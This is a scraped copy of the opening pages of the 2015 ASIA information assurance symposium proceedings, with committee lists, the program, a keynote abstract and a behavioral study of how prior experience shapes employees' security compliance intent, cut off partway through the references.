10th annual symposium on information assurance (asia ’15) · academic track of 18th annual nys...

91
Academic Track of 18 th Annual NYS Cyber Security Conference Empire State Plaza Albany, NY, USA June 2-3, 2015 10th Annual Symposium on Information Assurance (ASIA ’15) General ASIA Chair: Sanjay Goel Information Technology Management, School of Business University at Albany, State University of New York conference proceedings

Upload: dohuong

Post on 11-Apr-2018

218 views

Category:

Documents


1 download

TRANSCRIPT

Academic Track of 18th Annual NYS Cyber Security Conference

Empire State Plaza Albany, NY, USA

June 2-3, 2015

10th Annual Symposium on

Information Assurance (ASIA ’15)

General ASIA Chair:

Sanjay Goel

Information Technology Management, School of Business

University at Albany, State University of New York

conference proceedings

This volume is published as a collective work. Rights to individual papers remain with the author or the author’s employer.

Permission is granted for the noncommercial reproduction of the complete work for educational research purposes.

Proceedings of the 10th Annual Symposium on Information Assurance (ASIA ’15)

Academic track of the 18th Annual 2015 NYS Cyber Security Conference held on June 2-3, 2015, Albany, NY, USA.

Organizing Committee

Sanjay Goel, General Chair Director, FACETS & Director of Research, NYS

Center for Information Forensics and Assurance

Chair & Associate Professor, Information Tech. Mgt.,

School of Business, University at Albany, SUNY

Yuan Hong, Review Co-chair Assistant Professor, Digital Forensics Program,

School of Business, University at Albany, SUNY

Justin Giboney, Review Co-chair Assistant Professor, Digital Forensics Program,

School of Business, University at Albany, SUNY

Peter Stephenson, ASIA ’15 Chair Professor, School of Business, Norwich

University

Damira Pon, Publicity Chair Faculty, Digital Forensics Program, School of

Criminal Justice / School of Business,

University at Albany, SUNY

Fabio R. Auffant II, Tutorial Chair Lecturer, Digital Forensics Program, School

of Business, University at Albany, SUNY

Karen Sorady, Organization Chair

Manager, Governance, Risk and

Compliance – EISO

Ersin Dincelli, Proceedings Chair

Research Analyst, NYS Center for

Information Forensics and Assurance,

University at Albany, SUNY

Advisory Committee

Gurpreet Dhillon, VCU

Merrill Warkentin, Mississippi State

Nasir Memon, NYU Polytechnic

Bhavani Thuraisingham, UT Dallas

H. Raghav Rao, UBuffalo, SUNY

Technical Program Committee

Amir Masoumzadeh, University at Albany,

SUNY

Anil B. Somayaji, Carleton University, Canada

Anyi Liu, Indiana University - Purdue

University Fort Wayne (IPFW)

Ben Shao, Arizona State University

Bill Stackpole, RIT

Boleslaw Szymanski, RPI

Bradley Malin, Vanderbilt University

Brian Nussbaum, University at Albany,

SUNY

Corey Schou, Idaho State University

Daryl Johnson, RIT

Feng Chen, University at Albany, SUNY

Gary C. Kessler, Embry-Riddle Aeronautical

University

Gaurav Bansal, University of Wisconsin

George Berg, University at Albany, SUNY

George Markowsky, University of Maine

Hoang Pham, Rutgers University

Hong C. Li, Intel Corporation

Jim Hoag, Champlain University

Jingguo Wang, UT at Arlington

Kathy A. Enget, University at Albany, SUNY

Kevin J. Williams, University at Albany, SUNY

Leon Reznik, RIT

Linda Markowsky, University of Maine

M.P. Gupta, Indian Institute of Technology,

Delhi

Manish Gupta, M&T Bank

Mark Scanlon, University College Dublin

Martin Loeb, University of Maryland

Michael Oehler, l4311 Government Mitigation

Mohan Kankanhalli, National University of

Singapore

Murtuza Jadliwala, Wichita State University

Nan Zhang, George Washington University

Neetesh Saxena, SUNY, Korea & Stony

Brook University

Pavel Gladyshev, University College Dublin

Pradeep K. Atrey, University at Albany,

SUNY

Raj Sharman, University at Buffalo, SUNY

Shambhu Upadhyaya, University at Buffalo,

SUNY

Shiu-Kai Chin, Syracuse University

Siwei Lyu, University at Albany, SUNY

Tae Oh, RIT

Tejaswani Herath, Brock University

W. Art Chaovalitwongse, University of

Washington

Xuelian Long, Facebook

ASIA DINNER SPONSOR NYSCSC TERABYTE SPONSOR

NYSCSC KILOBYTE SPONSORS NYCSC MEGABYTE SPONSOR

Academic Track of 18th Annual NYS Cyber Security Conference

Empire State Plaza Albany, NY, USA

June 2-3, 2015

10th Annual Symposium on

Information Assurance (ASIA ’15)

General ASIA Chair:

Sanjay Goel

Information Technology Management, School of Business

University at Albany, State University of New York

conference proceedings

MESSAGE FROM ASIA GENERAL CHAIR

Welcome to the 10th Annual Symposium on Information Assurance (ASIA’15)! This event complements

the NYS Cyber Security Conference as its academic track with a goal of increasing interaction among

practitioners and researchers to foster infusion of academic research into practice. For the last several years,

ASIA has been a great success with excellent papers and participation from academia, industry, and

government and well-attended sessions. This year, we again have an excellent set of papers, invited talks,

and keynote address. We have been able to attract excellent keynote speakers and top information systems

researchers in the world to the conference.

I would like to thank the talented technical program committee that has supported the review process for

ASIA. In most cases, the papers were assigned to at least three reviewers who were either members of the

program committee or experts outside the committee. It was ensured that there was no conflict of interest.

The papers and the reviews were also personally read concurring with reviewer assessment. Our goal is to

keep the quality of submissions high as the symposium matures. There were multiple levels of quality

control – first with the reviewers, then with the program chair, and then with the general chair. The

committee serves a critical role in the success of the symposium and we are thankful for the participation

of each member.

I am grateful to the advisory committee members for their useful suggestions in managing the conference

and would like to thank our Program Chair, Peter Stephenson from Norwich University and our Review

Chairs, Yuan Hong and Justin Giboney from UAlbany in helping to manage the review process and setting

up an excellent program for ASIA. Fabio Auffant is our tutorial chair and we have three excellent tutorials

for this year’s conference. I would also like to thank our proceedings chair, Ersin Dincelli, who has worked

diligently on editorial review of the articles to ensure a high quality standard for our proceedings. Damira

Pon the publicity chair has done an excellent job in promoting the conference. Finally, we were fortunate

to have extremely dedicated partners in the Enterprise Information Security Office (EISO). Karen Sorady,

our organization chair, represents the EISO on our board and has been instrumental in planning the

conference.

NYS Office of Information Technology Services; the NYS Forum; and the University at Albany, State

University of New York (UAlbany). Our partners have managed the logistics for the conference, allowing

us to focus on the program management. We would like to thank the conference terabyte sponsor AT&T,

the conference megabyte sponsor CISCO, the conference kilobyte sponsors ePlus Technologies, Presidio,

Tanium, Symantec, and the symposium dinner sponsor – the University at Albany’s School of Business for

providing financial support for the symposium.

Most importantly, I would like to thank the authors for taking the time to prepare high quality manuscripts

and respecting the deadlines imposed on them allowing us sufficient time for reviews and publication.

I hope that you enjoy the symposium and continue to participate in the future. In each of the subsequent

years, we plan to have different themes in security-related areas. We also plan to hold the symposium next

year. If you would like to propose a track or partner on a future symposium, please let us know. The call

for papers for next year’s symposium will be distributed in the fall and we hope to see you again in 2016.

Sanjay Goel, ASIA General Chair

Director of FACETS & Director of Research, NYS Center for Information Forensics and Assurance

Associate Professor & Chair, Information Technology Management Department, School of Business

i

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA ’15)

DAY 1: Tuesday, June 2, 2015 (8:00am – 4:15pm)

REGISTRATION & VISIT EXHIBITORS – Base of the Egg (8:00 – 9:00am)

KEYNOTE (9:00 – 10:30am)

Welcome Address: Deborah Snyder, Information Technology Services

ASIA Welcome Remarks: James Stellar, Provost, University at Albany, SUNY, NY

Keynote: “Cyber Security End-to-End: What Each of Us Can Do Now” Jane Holl Lute, CEO of the Center for

Internet Security

BREAK / VISIT EXHIBITORS – Base of the Egg (10:30 – 11:00am)

Terabyte Sponsor Demo – AT&T (10:35 – 10:55am)

SYMPOSIUM SESSION 1: Behavioral Security (11:00 – 11:50am) Chair: Damira Pon, University at Albany, SUNY, NY

Paper: How Direct and Vicarious Experience Promotes Security Hygiene

Leigh A. Mutchler, University of Tennessee and Merrill Warkentin, Mississippi State University

Paper: Two Studies on Password Memorability and Perception

Delbert Hart, SUNY Plattsburgh

LUNCH / VISIT EXHIBITORS – Base of the Egg (11:50am – 1:00pm)

SYMPOSIUM SESSION 2: Service Security (1:00 – 1:50pm) Chair: Justin Giboney, University at Albany, SUNY, NY

Paper: A Holistic Approach for Service Migration Decision, Strategy and Scheduling Yanjun Zuo, University of North Dakota, ND Invited Talk: Post-audit of Service Security Investment: Using Simulation Approach Hemantha S. B. Herath and Tejaswini C. Herath, Brock University, Canada

BREAK / VISIT EXHIBITORS – Base of the Egg (1:50 – 2:10pm)

Megabyte Sponsor Demo – Cisco (1:55 – 2:05pm)

SYMPOSIUM SESSION 3: Cyber Attacks (2:10 – 3:00pm) Chair: Victoria Kisseka, University at Buffalo, SUNY, NY

Paper: Crowdsourcing Computer Security Attack Trees

Matthew Tentilucci, Nick Roberts, Shreshth Kandari, Daryl Johnson, Dan Bogaard, Bill Stackpole; Rochester

Institute of Technology, NY, and George Markowsky, University of Maine, ME

Paper: A Covert Channel in the Worldwide Public Switched Telephone Network Dial Plan Bryan Harmat, Jared Stroud, and Daryl Johnson, Rochester Institute of Technology, NY

BREAK / VISIT EXHIBITORS – Base of the Egg (3:00 – 3:20pm)

SYMPOSIUM SESSION 4: International Security Cooperation & Cyber Warfare (3:20 – 4:15pm) Chair: Sanjay Goel, University at Albany, SUNY, NY

Paper: International Cooperation to Enhance Website Security

Manmohan Chaturvedi, CISO Academy, India and Srishti Gupta, VIT University, India

Invited Talk: Information Sharing to Manage Cyber Incidents: Deluged with Data Yet Starving for

Timely Critical Data

Sanjay Goel, University at Albany, SUNY, NY and Charles Barry, National Defense University, Washington, DC

END OF DAY 1

ii

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA ’15)

DAY 2: Wednesday, June 3, 2015 (8:00am – 3:45pm)

REGISTRATION / VISIT EXHIBITORS – Base of Egg (8:00 – 8:30am)

KEYNOTE (8:30 – 10:00am)

Introduction and ASIA Welcome: Sanjay Goel, ASIA General Chair

School of Business, University at Albany, State University of New York

Keynote: “Whose Job is it to Solve the Cybersecurity Problem?” Bruce McConnell, EastWest Institute, NY

BREAK / VISIT THE EXHIBITORS – Base of the Egg (10:00 – 10:30am)

Terabyte Sponsor Demo – AT&T (10:05 – 10:25am)

SYMPOSIUM SESSION 5: Digital Forensics (10:30 – 11:20am) Chair: Fabio Auffant, University at Albany, SUNY, NY

Paper: Shot Segmentation and Grouping for PTZ Camera Videos Andrew Pulver, University at Albany, SUNY, NY, Ming-Ching Chang, GE Global Research, NY, and Siwei Lyu,

University at Albany, SUNY, NY

Invited Talk: Securing against Malicious Hardware Trojans

Sanjay Goel, University at Albany, SUNY, NY, John G. Hartley, Colleges of Nanoscale Science and Engineering,

SUNY, and Yuan Hong, University at Albany, SUNY, NY

BREAK / VISIT THE EXHIBITORS – Base of the Egg (11:20 – 11:40am)

Megabyte Sponsor Demo – Cisco (11:25 – 11:35am)

SYMPOSIUM SESSION 6: Cloud Computing and Internet of Things (11:40 – 12:30pm) Chair: Yuan Hong, University at Albany, SUNY, NY

Paper: Secure Audio Reverberation over Cloud

M. Abukari Yakubu, University of Winnipeg, Canada, Pradeep K. Atrey, University at Albany, SUNY, NY, and

Namunu C. Maddage, University of Melbourne, Australia

Paper: Using Features of Cloud Computing to Defend Smart Grid against DDoS Attacks

Anthony Califano, Ersin Dincelli, and Sanjay Goel, University at Albany, SUNY, NY

LUNCH / VISIT THE EXHIBITORS – Base of the Egg (12:30 – 1:40pm)

SYMPOSIUM SESSION 7: Disasters and Incident Response (1:40 – 2:30pm) Chair: Pradeep Atrey, University at Albany, SUNY, NY

Paper: Trust Management in Resource Constraint Networks Thomas A. Babbitt and Boleslaw Szymanski, Rensselaer Polytechnic Institute, NY

Paper: Investigating Information Security Effectiveness after an Extreme Event

Victoria Kisekka, University at Buffalo, NY

BREAK / VISIT THE EXHIBITORS – Base of the Egg (2:30 – 2:50pm)

SYMPOSIUM SESSION 8: Network Security (2:50 – 3:45pm) Chair: George Berg, University at Albany, SUNY, NY

Paper: A Layer 2 Protocol to Protect the IP Communication in a Wired Ethernet Network Reiner Campillo, Ministry of Higher Education, Science and Technology, Dominican Republic and Tae Oh,

Rochester Institute of Technology, NY

Paper: Proposed Terminal Device for End-to-End Secure SMS in Cellular Networks

Neetesh Saxena, SUNY, Korea / Stony Brook University, NY and Narendra S Chaudhari, Visvesvaraya National

Institute of Technology / Indian Institute of Technology Indore

CLOSING REMARKS (3:45 – 4:00pm) Sanjay Goel, General Chair

iii

TABLE OF CONTENTS

Day 1 Keynote

Cyber Security End-to-End: What Each of Us Can Do Now ……………………………......

Jane Holl Lute, CEO of the Center for Internet Security

1

Session 1: Behavioral Security

How Direct and Vicarious Experience Promotes Security Hygiene ………………………..

Leigh A. Mutchler, University of Tennessee and Merrill Warkentin, Mississippi State University

Two Studies on Password Memorability and Perception …………………………………...

Delbert Hart, SUNY Plattsburgh

2

7

Session 2: Service Security

A Holistic Approach for Service Migration Decision, Strategy and Scheduling …………...

Yanjun Zuo, University of Dakota, ND

Invited Talk: Post-audit of Service Security Investment: Using Simulation Approach …...

Hemantha Herath and Tejaswini Herath, Brock University, Canada

14

18

Session 3: Cyber Attacks

Crowdsourcing Computer Security Attack Trees …………………………………………… Matt Tentilucci, Nick Roberts, Shreshth Kandari, Daryl Johnson, Dan Bogaard, Bill Stackpole;

Rochester Institute of Technology, NY, and George Markowsky, University of Maine, ME

A Covert Channel in the Worldwide Public Switched Telephone Network Dial Plan ……..

Bryan Harmat, Jared Stroud and Daryl Johnson, Rochester Institute of Technology, NY

19

24

Session 4: International Security Cooperation & Cyber Warfare

International Cooperation to Enhance Website Security …………………………………….

Manmohan Chaturvedi, CISO Academy, India and Srishti Gupta, VIT University, India

Invited Talk: Information Sharing to Manage Cyber Incidents: Deluged with Data Yet

Starving for Timely Critical Data ……………………………………………………………...

Sanjay Goel, University at Albany, SUNY, NY and Charles Barry, National Defense University,

Washington, DC

28

32

iv

TABLE OF CONTENTS, CONT’D.

Day 2 Keynote

Whose Job is it to Solve the Cybersecurity Problem? ……………………………………….. Bruce McConnell, Senior Vice President of the EastWest Institute, NY

33

Session 5: Digital Forensics Shot Segmentation and Grouping for PTZ Camera Videos …………………………………

Andrew Pulver, University at Albany, SUNY, NY, Ming-Ching Chang, GE Global Research, NY

and Siwei Lyu, University at Albany, SUNY, NY

Invited Talk: Securing against Malicious Hardware Trojans ……………………………...

Sanjay Goel, University at Albany, SUNY, NY, John G. Hartley, Colleges of Nanoscale Science

and Engineering, SUNY, and Yuan Hong, University at Albany, SUNY, NY

34

38

Session 6: Cloud Computing and Internet of Things

Secure Audio Reverberation over Cloud ……………………………………………………....

M. Abukari Yakubu, University of Winnipeg, Canada, Pradeep K. Atrey, University at Albany,

SUNY, NY and Namunu C. Maddage, University of Melbourne, Australia

Using Features of Cloud Computing to Defend Smart Grid against DDoS Attacks ………..

Anthony Califano, Ersin Dincelli, and Sanjay Goel, University at Albany, SUNY, NY

39

44

Session 7: Disasters and Incident Response

Trust Management in Resource Constraint Networks ………………………………………

Thomas A. Babbitt and Boleslaw Szymanski, Rensselaer Polytechnic Institute, NY

Investigating Information Security Effectiveness after an Extreme Event ………………...

Victoria Kisekka, University at Buffalo, NY

51

57

Session 8: Network Security

A Layer 2 Protocol to Protect the IP Communication in a Wired Ethernet Network ……...

Reiner Campillo, Ministry of Higher Education, Science and Technology, Dominican Republic

and Tae Oh, Rochester Institute of Technology, NY

Proposed Terminal Device for End-to-End Secure SMS in Cellular Networks Approach ...

Neetesh Saxena, SUNY, Korea / Stony Brook University, NY and Narendra S Chaudhari,

Visvesvaraya National Institute of Technology / Indian Institute of Technology Indore

60

67

Author Biographies……………………………………………………………………………… 73

Index of Authors ……………………………………………………………………...………….

81

Cyber Security End-to-End:

What Each of Us Can Do Now

Jane Holl Lute Chief Executive Officer of the Center for Internet Security

ANE Holl Lute, Chief Executive Officer of the Center for Internet Security will present an engaging keynote that dispels the

myth that cyberspace is the "Wild Wild West," but rather an environment over which we can exert significant influence. She

will challenge the audience to see the powerful role each individual plays in our collective cybersecurity ecosystem, and to

understand that improving cybersecurity is within our reach. Ms. Lute will discuss how the adoption of foundational cyber

hygiene measures will result in immediate and measurable protections against the vast majority of cyber attacks and incidents.

BIOGRAPHY

Ms. Lute serves as Chief Executive Officer (CEO) of the Center for Internet Security (CIS), an international nonprofit

organization focused on enhancing cybersecurity readiness and response for the public and private sectors. Ms. Lute most

recently served as the President and Chief Executive Officer of the Council on CyberSecurity, an independent, expert

organization dedicated to the security of an open Internet. Prior to joining CIS, Ms. Lute served as Deputy Secretary for the

Department of Homeland Security (DHS). As the DHS chief operating officer, Ms. Lute was responsible for the day-to-day

management of the Department's efforts to prevent terrorism and enhance security, secure and manage the nation's borders,

administer and enforce U.S. immigration laws, strengthen national resilience in the face of disasters, and ensure the nation's

cybersecurity.

From 2003-2009, Ms. Lute served as Assistant Secretary-General of the United Nations (UN) and established the

Department of Field Support, responsible for comprehensive on-the-ground support to UN peace operations worldwide,

including rapid-response efforts in support of development and humanitarian operations and crises. Ms. Lute also served as

Assistant Secretary-General for Peacebuilding, responsible for coordinating efforts on behalf of the Secretary General to build

sustainable peace in countries emerging from violent conflict.

Prior to joining the UN, Ms. Lute was Executive Vice-President and Chief Operating Officer of the United Nations

Foundation and the Better World Fund. From 1994-2000, she worked with David A. Hamburg, former president of the

Carnegie Corporation of New York, and Cyrus Vance, former U.S. Secretary of State, on the Carnegie Commission on

Preventing Deadly Conflict, a global initiative that pioneered the cause of conflict prevention.

Ms. Lute served on the National Security Council staff under both President George H.W. Bush and President William

Jefferson Clinton and had a distinguished career in the United States Army, including service in the Gulf during Operation

Desert Storm. She has a Ph.D. in political science from Stanford University and a J.D. from Georgetown University.

J

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 1

How Direct and Vicarious Experience

Promotes Security Hygiene

Leigh A. Mutchler

Accounting and Information Management

University of Tennessee

Knoxville, TN, USA

[email protected]

Merrill Warkentin

Management and Information Systems

Mississippi State University

Mississippi State, MS, USA

[email protected]

Abstract—This conference proceedings paper presents part of

a larger study that is being prepared for publication in an

academic journal. Elements are withheld from the printed

version, but will be presented at the conference in Albany.

Readers may contact the authors for more information.

Keywords—computer security hygiene; security behaviors;

compliance; direct experience; vicarious experience; SETA

programs; protection motivation; PMT; threat; response; social

influence; self-efficacy

I. INTRODUCTION

Information Systems (IS) security practitioners continually struggle to keep abreast of the numerous information security threats that face modern organizations. For example, in 2014 there was a 40% increase in attacks on large companies, including the attacks on Sony, Home Depot, JP Morgan, Uber, and Premera Blue Cross [1-4]. In that same year a record high number of zero-day vulnerabilities such as the “Heartbleed Bug” was reached [4-6]. Even good news in 2014 was overshadowed by bad news when a report released by Proofpoint [7] reported that while security awareness programs contributed to a 94% decrease in the success rate of phishing attacks, attackers quickly responded with modified attack approaches directed toward new targets.

Security threats to an organization come in all shapes and sizes [8, 9] requiring the implementation of both technical and behavioral controls. The policies and procedures regarding expected secure behaviors are documented in the information security policy (ISP). Employees have knowledge of and access to organizational data and systems, and as such are known to be “insider threats” which in turn makes ensuring their compliance with the ISP particularly complex [10-16]. Many times employee noncompliance with the ISP unintentionally results in threats to the organization. For example, employees who forget to consistently comply with a clean desk policy put corporate information at risk, but the risk is accidental. Employees may not fully understand proper data backup procedures, which creates a risk for data loss, but again this risk is not deliberate. Errors, misunderstandings, and poor judgment will always exist in the workplace, and instructional programs are the typical control applied to protect against unwanted employee behaviors, including ISP compliance behaviors.

The instructional program often favored by organizations to ensure employees comply with the ISP is the Security

Education, Training, and Awareness (SETA) program [11, 17-19]. The SETA program consists of three levels as summarized in Table 1. The awareness level of SETA instruction is the primary level of interest in this study because it is provided to all employees. Awareness is intended to supply employees with the foundation of information security knowledge necessary to act in a secure manner as they fulfill their job duties. The training level is typically directed toward managers and expands the awareness instruction with a skills component that is anticipated to better prepare supervisory employees to assist subordinate employees. The education level is beyond the scope of this study as it is typically restricted to the IS professionals of an organization.

Awareness instruction is generally delivered using a classroom or a self-paced online learning model [19-22]. Awareness often focuses on repetition of the information to keep employees “aware” of the ever-present security issues. Awareness programs are often reported to be ineffective [10, 23] and are argued by some to be a waste of organizational resources [24]. So what is missing – why isn’t awareness enough?

TABLE I. BEHAVIORAL CONTROL - SECURITY INSTRUCTION

SETA Instruction Levels [adapted from 20]

EDUCATION TRAINING AWARENESS

Attribute “Why” “How” “What”

Level: Insight Knowledge Information

Learning

Objective: Understanding Skill

Recognition

and Retention

Teaching

Method:

Theoretical

Instruction Practical Instruction

Informational

Instruction

Employee: IS Professionals IS Management

Non-IS Supervisors Non-IS Managers

All

Impact

Timeframe: Long-term Intermediate Short-term

Awareness instruction content is recommended to be delivered at a basic level to better ensure that all employees, regardless of their backgrounds, will be able to understand how to behave in a secure manner. However, there still tends to be a gap between understanding the instruction provided and performing the secure behaviors [25]. Experience may be a key component to close the gap between the instruction and behavior. Take, for example, social engineering which includes phishing and for which instruction is the undisputed primary defense. Chris Hadnagy, a social engineering expert

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 2

[26] recommends adding direct experience to an instruction program because it can greatly improve the outcomes of instruction. He states that phishing awareness instruction that is combined with the direct experience of an internally controlled phishing ruse is more effective and has been shown to drop the future success rate of phishing attacks by more than 75% [27]. For similar reasons, numerous penetration testers are taking advantage of controlled attacks to provide an opportunity to enhance the network staff security instruction with the direct experience of a hack [28]. These cases where information security instruction is enhanced by direct experience leads to the following research question explored in this study:

What role does an individual’s previous experience with information security play in the individual’s secure behavioral intent?

The exploration performed in this study included a collection of data through an online survey. Fear appeals and the Protection Motivation Theory (PMT) [29] along with SETA instruction provided the framework for the measures. The goals included gaining a better understanding of the role that experience plays in the behavioral intent to perform secure actions. The presentation of this study continues with a discussion of the background, the model and method, the results, and the conclusions along with insights for future research.

II. BACKGROUND AND THEORETICAL SUPPORT

Awareness instruction is a persuasive organizational campaign [30-32] with the goal to successfully instruct and encourage employees to perform preferred secure behaviors. The Protection Motivation Theory (PMT) [29, 33] explains that a fear appeal provides information to an individual about a significant threat that is likely to occur, and about an effective response against the threat that can easily be performed by the individual. Fear appeals are messages framed to incite individual concerns and the goal is to persuade the individuals to perform certain behaviors, which fits well within the context of information security instruction. The PMT process model is illustrated in Fig. 1, which shows that an individual will assess the fear appeal information, along with information related to personal experience and other personality characteristics, in order to choose a behavioral response. It is not surprising that an increasing number of researchers, including those of this study, have explored the fit of the fear appeal and PMT within the context of information security.

Behavioral research within the context of information security makes up an important part of the research being performed in the field of IS today [14, 36-38]. Individual behaviors, including employee compliance with the ISP, are complex and difficult to predict. An Employee’s compliance with the ISP is ultimately a choice they make, therefore organizations need to encourage employees to choose to comply. Human characteristics such as attitudes and beliefs are known to influence choice, and both are known to be influenced by experience [39-41]. An individual’s experiences are known to be strong predictors of the acceptance and use of information technology [42, 43] , and interaction with information technologies is frequently necessary to comply with procedures documented in the ISP; therefore experience

plays a part in the employee’s ISP compliance. New employees gain experiences vicariously through observation, and these experiences teach them about the expected behaviors, including how to comply with the ISP [44]. Differing levels of experience with information security threats and responses will affect an employee’s choices, technology usage, and ultimately their ISP compliance and should therefore be taken into account when developing information security instructional programs. The SETA program, particularly the awareness level of instruction, is the primary mechanism used by organizations to encourage employee compliance with the ISP. The fear appeal, supported by PMT, provides an appropriate framework for awareness instruction, but an employee’s experience should also be taken into account. In this study, the individual direct and vicarious experiences with information security threats and with responses are examined to gain an understanding of the role experience plays with ISP compliance and to determine whether taking into consideration an employee’s experience may benefit information security awareness programs.

III. RESEARCH MODEL AND HYPOTHESES DEVELOPMENT

A fear appeal is a persuasive message that is much like the messages included in awareness instruction programs. Both provide information regarding threats that are severe and likely to occur. Both also provide information regarding recommended responses that work, are not difficult to perform, and do not incur costs that outweigh the performance of the protective response [33, 35, 45]. A fear appeal and its measures are, therefore, appropriate for this study. The fear appeal core constructs included are threat severity (TSU), threat susceptibility (TSV), response efficacy (REF), self-efficacy (SEF), and response cost (RSC). Additionally, social influence (SOC) is included because of the strong influence others can exert on an individual’s behavior choices [40], including those regarding the use of technology [42, 46], and their intent to perform secure behaviors [47-52], all of which are relevant to this study.

Fig. 1. Protection Motivation Theory Schema [adapted from 34,35]

Experience is contextual and in the context of information security issues an individual will have varying levels of experience with threats and with recommended responses. Experience may also be decomposed into direct and vicarious components, and within an exploratory study such as this, examining the components separately will provide the richer understanding desired. A separate analysis of the direct and vicarious components of experience further supported by the PMT process model. Therefore, four elements of experience

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 3

including direct and vicarious threat experience and direct and vicarious response experience, are explored in this study.

The objective of this study is to explore the impact of an individual’s prior experience on the relationships between the traditional PMT variables and the individual’s security hygiene, as represented by his or her behavioral intent to engage in secure behavior. Experience is a known source of influence on the antecedents of behavioral intent, and in the context of this study that influence is proposed to be one of moderation. Due to the exploratory nature of this study, tests for moderation by the experience components on each of the relationships between the core fear appeal constructs and the dependent variable behavioral intent (BEH) were conducted. The research model in Fig. 2 illustrates these predictions, and the specific hypotheses include hypothesis 1a that predicts a moderating influence by DTE on the relationship between TSU and BEH, hypothesis 1b predicts a moderating influence by DRE on the same TSU-BEH relationship, hypothesis 1c predicts a moderating influence by VTE on the TSU-BEH relationship, and 1d predicts a moderating influence by VRE on the relationship between TSU and BEH.

H1a-d: The relationship between an individual’s perception of threat susceptibility and their reported behavioral intent will be moderated by at least one of the components of experience - direct threat, direct response, vicarious threat, and vicarious response.

Similarly hypotheses 2 through 6 predict moderating influences by each of the experience components, DTE, DRE, VTE, and VRE, on the relationships between the remaining core fear appeal constructs TSV, REF, SEF, and RSC and BEH as follows:

H2a-d: The relationship between an individual’s perception of threat severity and their reported behavioral intent will be moderated by direct threat, direct response, vicarious threat, and or vicarious response.

H3a-d: The relationship between an individual’s perception of response efficacy and their reported behavioral intent will be moderated by direct threat, direct response, vicarious threat, and or vicarious response.

H4a-d: The relationship between an individual’s perception of self-efficacy and their reported behavioral intent will be moderated by direct threat, direct response, vicarious threat, and or vicarious response.

H5a-d: The relationship between an individual’s perception of response cost and their reported behavioral intent will be moderated by direct threat, direct response, vicarious threat, and or vicarious response.

H6a-d: The relationship between an individual’s perception of social influence and their reported behavioral intent will be moderated by direct threat, direct response, vicarious threat, and or vicarious response.

IV. RESEARCH METHOD AND DATA ANALYSIS

(Note: Details of the research design, data collection, and data analysis will be presented at the conference.)

Fig. 2. Research Model with Hypothesized Moderating Relationships

V. DISCUSSION

Our analysis, which will be presented at the conference, suggests evidence of significant interactions by at least one experience variable on each of the relationships between the indicators TSU, TSV, REF, SEF, RSC, and SOC perceptions and the dependent variable, BEH. Direct threat, vicarious threat, and vicarious response experiences were found to act as moderators in more than one relationship, but none of the relationships tested in this study were found to be moderated by direct response experience. Findings and discussion will be presented in Albany.

VI. CONCLUSION

SETA information security instruction programs are intended to provide employees with an adequate level of instruction so they will be well-equipped to comply with the ISP, yet employee compliance does not always result. This study proposed that a better understanding of the role of prior experience within this context may help to close the gap. Our analysis explored that proposition, and the test results indicate that experience does significantly interact with individual perceptions of threat susceptibility and severity and with perceptions of response efficacy, self-efficacy, response cost, and social influence. No evidence of moderation due to direct response experience was identified, but direct threat experience, vicarious threat experience, and vicarious response experience were found to interact with at least one of the predictor variables, and each of the interactions positively affect the relationships between the predictors and behavioral intent, supporting this study’s proposition. Follow-up studies are planned to perform more in-depth examinations of the predictive relationships between the fear appeal core constructs and behavioral intent, combined with examination of the mediations identified here, to better understand the true value of this study’s findings and to ultimately better understand the role of experience within this context.

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 4

REFERENCES

[1] L. Div, (2015, Jan.), "Lessons from 2014 mega breaches: It's time to shift to a post-breach mindset," Forbes, [On-line], Available: http://www.forbes.com/sites/frontline/2015/01/07/lessons-from-2014-mega-breaches-its-time-to-shift-to-a-post-breach-mindset/, [May 9, 2015].

[2] D. Lewis, (2015, Feb.), "Uber suffers data breach affecting 50,000," Forbes, [On-line], Available: http://www.forbes.com/sites/davelewis/2015/02/28/uber-suffers-data-breach-affecting-50000/, [May 9, 2015].

[3] K. Vinton, (2015, Mar.), "Premera Blue Cross breach may have exposed 11 million customers' medical and financial data," Forbes, [On-line], Available: http://www.forbes.com/sites/katevinton/2015/03/17/11-million-customers-medical-and-financial-data-may-have-been-exposed-in-premera-blue-cross-breach/, [May 9, 2015].

[4] (2015, Apr.), “Internet security threat report vol. 20,” [On-line], Available: http://www.symantec.com/about/news/resources/press_kits/detail.jsp?pkid=istr-20, [May 13, 2015].

[5] (2015, Apr.), "Deceptive new tactics give advanced attackers free reign over corporate networks," InformationWeek, [On-line], Available: http://www.darkreading.com/endpoint/deceptive-new-tactics-give-advanced-attackers-free-reign-over-corporate-networks/d/d-id/1319942, [May 9, 2015].

[6] J. Johnson, (2015, Jan.), "If 2014 was the year of the data breach, brace for more," Forbes, [On-line], Available: http://www.forbes.com/sites/danielfisher/2015/01/02/if-2014-was-the-year-of-the-data-breach-brace-for-more/, [May 9, 2015].

[7] (2014, Sept.), “Managing cyber risks in an interconnected world: The global state of information security survey 2015,” [On-line], Available: http://www.pwc.com/gsiss2015, [May 13, 2015]

[8] (2015), “The human factor 2015: A Proofpoint research report,” [On-line], Available: https://www.proofpoint.com/, [May 9, 2015].

[9] K. D. Loch, H. H. Carr, and M. E. Warkentin, “Threats to Information Systems: Today's Reality, Yesterday's Understanding,” MIS Quarterly, vol. 16, no. 2, pp. 173-186, 1992.

[10] M. Warkentin, and L. A. Mutchler, "Behavioral Information Security Management," in Computing Handbook: Information Systems and Information Technology, T. Heikki and A. Tucker, eds., Boca Raton, FL: Taylor & Francis Group, 2014.

[11] M. A. Davis, (2012, May), “2012 strategic security survey,” InformationWeek, [On-line], Available: http://reports.informationweek.com/abstract/21/8807/Security/2012-Strategic-Security-Survey.html, [May 8, 2012].

[12] R. Willison, and M. Warkentin, “Beyond deterrence: An expanded view of employee computer abuse,” MIS Quarterly, vol. 37, no. 1, pp. 1-20, 2013.

